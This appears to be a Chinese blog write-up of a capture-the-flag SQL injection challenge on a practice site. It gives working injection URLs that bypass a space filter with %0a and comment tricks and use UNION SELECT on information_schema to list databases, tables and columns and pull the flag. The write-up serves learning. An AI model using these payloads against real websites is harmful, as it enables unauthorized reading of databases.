zoukankan      html  css  js  c++  java
  • 实验吧一注入题

    在做题中搜索遇到了这题,http://ctf5.shiyanbar.com/web/index_2.php?id=1

    加一个单引号报错了。可以简单猜测一下其sql语句为 :select * from admin where id = '1'

    现在多加了一个但因好就会出现。

    select * from admin where id = '1'‘

    <pre>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1</pre>

    过滤了空格,直接%0a进行绕过。

       http://ctf5.shiyanbar.com/web/index_2.php?id=1'order%0aby%0a1%23 判断出字段数是1

    跑所有裤

    http://ctf5.shiyanbar.com/web/index_2.php?id=1'union/**/select/**/group_concat(schema_name)/**/from/**/information_schema.schemata%23

    应该是web1这个库

    爆所有表:

    http://ctf5.shiyanbar.com/web/index_2.php?id=1'union/**/select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=0x77656231%23

     

    爆列:

    http://ctf5.shiyanbar.com/web/index_2.php?id=1'union/**/select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=0x77656231%23

     最终得到flag

    http://ctf5.shiyanbar.com/web/index_2.php?id=1'union/**/select/**/flag/**/from/**/flag%23

  • 相关阅读:
    Selenium RC For Python:教程2
    sql server 获取同比或环比
    C#泛型泛型集合Dictionary<K,V>
    C# FileStream
    c# 强命名的作用
    装箱与拆箱的概念及意义
    SQL Server中Rollup关键字使用技巧
    Javascript内存泄露
    几条复杂的SQL语句
    Group by与having理解
  • 原文地址:https://www.cnblogs.com/nul1/p/9067603.html
Copyright © 2011-2022 走看看